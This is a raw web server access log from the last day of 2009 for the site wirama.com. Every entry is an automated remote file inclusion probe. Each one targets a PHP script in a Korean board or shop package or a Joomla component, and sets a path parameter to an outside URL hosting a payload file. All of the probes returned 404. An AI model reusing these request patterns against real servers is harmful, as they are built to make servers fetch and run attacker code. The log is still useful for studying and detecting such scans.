208.187.91.50 - - [31/Dec/2009:18:07:08 -0800] "GET /logs/access_090329.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
208.187.91.50 - - [31/Dec/2009:18:07:08 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
208.187.91.50 - - [31/Dec/2009:18:07:08 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.45.123.132 - - [31/Dec/2009:18:07:14 -0800] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.metropolitanediciones.com/efectos/pw.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
201.45.123.132 - - [31/Dec/2009:18:07:15 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.metropolitanediciones.com/efectos/pw.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:07:16 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.45.123.132 - - [31/Dec/2009:18:07:16 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.metropolitanediciones.com/efectos/pw.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:07:16 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:07:16 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:07:21 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:07:25 -0800] "GET /logs/access_090329.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:07:25 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:07:37 -0800] "GET /logs/access_090330.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:07:39 -0800] "GET /logs/access_090330.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
208.187.91.50 - - [31/Dec/2009:18:08:16 -0800] "GET /logs/access_090330.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:08:19 -0800] "GET /logs/access_091101.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.105.128.135 - - [31/Dec/2009:18:08:19 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.105.128.135 - - [31/Dec/2009:18:08:19 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
208.187.91.50 - - [31/Dec/2009:18:08:24 -0800] "GET /logs/access_090330.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:08:27 -0800] "GET /logs/access_090401.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.105.128.135 - - [31/Dec/2009:18:10:20 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:10:20 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:10:20 -0800] "GET /logs/access_090329.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:11:07 -0800] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:11:07 -0800] "GET /logs/access_090801.log%20%20//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:11:07 -0800] "GET /logs//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:11:25 -0800] "GET /logs/access_090330.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
208.187.91.50 - - [31/Dec/2009:18:12:12 -0800] "GET /logs/access_090329.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
208.187.91.50 - - [31/Dec/2009:18:12:21 -0800] "GET /logs/access_090329.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:12:32 -0800] "GET /logs/////include/mail.inc.php?skin_board_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.105.128.135 - - [31/Dec/2009:18:12:32 -0800] "GET ////include/mail.inc.php?skin_board_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.105.128.135 - - [31/Dec/2009:18:12:32 -0800] "GET /logs/access_090501.log/////include/mail.inc.php?skin_board_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
208.187.91.50 - - [31/Dec/2009:18:12:42 -0800] "GET /logs/access_090330.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.105.128.135 - - [31/Dec/2009:18:12:51 -0800] "GET /logs/access_090701.log/////include/mail.inc.php?skin_board_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
208.187.91.50 - - [31/Dec/2009:18:12:57 -0800] "GET /logs/access_090330.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:14:04 -0800] "GET /logs/access_090330.log%20%20//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.45.123.132 - - [31/Dec/2009:18:14:56 -0800] "GET /logs/access_090801.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.metropolitanediciones.com/efectos/pw.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:16:04 -0800] "GET /logs/access_090801.log%20%20//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:16:04 -0800] "GET /logs//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:16:05 -0800] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.151.114.34 - - [31/Dec/2009:18:19:13 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:18:19:13 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:18:19:13 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:18:19:14 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:18:19:14 -0800] "GET /logs/access_091031.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:18:19:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [31/Dec/2009:18:19:14 -0800] "GET /logs/access_091031.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [31/Dec/2009:18:19:16 -0800] "GET /logs//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [31/Dec/2009:18:19:16 -0800] "GET /bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [31/Dec/2009:18:19:16 -0800] "GET /logs/access_091101.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [31/Dec/2009:18:19:16 -0800] "GET /bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [31/Dec/2009:18:19:16 -0800] "GET /logs/access_091101.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [31/Dec/2009:18:19:16 -0800] "GET /logs//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [31/Dec/2009:18:19:17 -0800] "GET /logs/access_091101.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [31/Dec/2009:18:19:17 -0800] "GET /bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [31/Dec/2009:18:19:17 -0800] "GET /logs//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [31/Dec/2009:18:19:19 -0800] "GET /logs/access_091101.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [31/Dec/2009:18:19:19 -0800] "GET /bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [31/Dec/2009:18:19:19 -0800] "GET /logs//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [31/Dec/2009:18:19:24 -0800] "GET /logs//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [31/Dec/2009:18:19:24 -0800] "GET /bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [31/Dec/2009:18:19:29 -0800] "GET /logs/access_091101.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [31/Dec/2009:18:19:31 -0800] "GET /bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [31/Dec/2009:18:19:31 -0800] "GET /logs//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [31/Dec/2009:18:19:31 -0800] "GET /logs/access_091101.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [31/Dec/2009:18:19:32 -0800] "GET /logs/access_091031.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [31/Dec/2009:18:19:40 -0800] "GET /logs/access_091031.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:19:54 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:19:55 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:19:55 -0800] "GET /logs/access_090801.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:19:58 -0800] "GET /logs/access_090330.log%20%20//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [31/Dec/2009:18:19:58 -0800] "GET /logs/access_091101.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [31/Dec/2009:18:19:58 -0800] "GET /bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [31/Dec/2009:18:19:58 -0800] "GET /logs//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.120.139.148 - - [31/Dec/2009:18:20:01 -0800] "GET /logs/access_091101.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.120.139.148 - - [31/Dec/2009:18:20:01 -0800] "GET /bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.120.139.148 - - [31/Dec/2009:18:20:01 -0800] "GET /logs//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.120.139.148 - - [31/Dec/2009:18:20:08 -0800] "GET /logs/access_091031.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [31/Dec/2009:18:20:09 -0800] "GET /bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.120.139.148 - - [31/Dec/2009:18:20:09 -0800] "GET /logs//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.120.139.148 - - [31/Dec/2009:18:20:09 -0800] "GET /logs/access_091101.log%20%20//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [31/Dec/2009:18:20:22 -0800] "GET /logs//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [31/Dec/2009:18:20:22 -0800] "GET /logs/access_091101.log%20%20//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [31/Dec/2009:18:20:22 -0800] "GET /bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.120.139.148 - - [31/Dec/2009:18:21:07 -0800] "GET /logs/access_091031.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [31/Dec/2009:18:21:08 -0800] "GET /logs/access_091031.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [31/Dec/2009:18:21:51 -0800] "GET /logs//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.175.5.130 - - [31/Dec/2009:18:21:51 -0800] "GET /logs/access_091101.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.175.5.130 - - [31/Dec/2009:18:21:51 -0800] "GET /bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
208.187.91.50 - - [31/Dec/2009:18:21:54 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
208.187.91.50 - - [31/Dec/2009:18:21:54 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
208.187.91.50 - - [31/Dec/2009:18:21:54 -0800] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
208.187.91.50 - - [31/Dec/2009:18:21:54 -0800] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [31/Dec/2009:18:21:55 -0800] "GET /bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.175.5.130 - - [31/Dec/2009:18:21:55 -0800] "GET /logs//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.175.5.130 - - [31/Dec/2009:18:21:55 -0800] "GET /logs/access_091101.log%20%20//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
208.187.91.50 - - [31/Dec/2009:18:22:08 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
208.187.91.50 - - [31/Dec/2009:18:22:08 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
208.187.91.50 - - [31/Dec/2009:18:22:08 -0800] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:22:09 -0800] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:22:09 -0800] "GET /logs//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:22:09 -0800] "GET /logs/access_090401.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
